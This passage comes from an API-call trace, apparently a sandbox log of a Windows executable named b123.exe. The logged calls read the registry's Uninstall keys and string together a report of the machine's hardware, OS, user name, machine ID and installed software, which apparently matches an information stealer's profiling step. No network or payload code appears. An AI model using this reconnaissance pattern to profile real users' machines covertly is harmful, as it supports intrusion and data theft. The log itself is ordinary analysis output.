4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component " [0235.134] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component ", lpString2="16.0.4266.1003" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003" [0235.134] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n" [0235.134] RegCloseKey (hKey=0x384) returned 0x0 [0235.134] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1e, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.134] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}") returned 90 [0235.134] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.134] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x197fac*=0x3f) returned 0x0 [0235.134] lstrlenA (lpString="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned 62 [0235.135] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\n", lpString2="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161" [0235.135] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="9.0.30729.6161", lpcbData=0x197fac*=0xf) returned 0x0 [0235.135] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 " [0235.135] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 ", lpString2="9.0.30729.6161" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 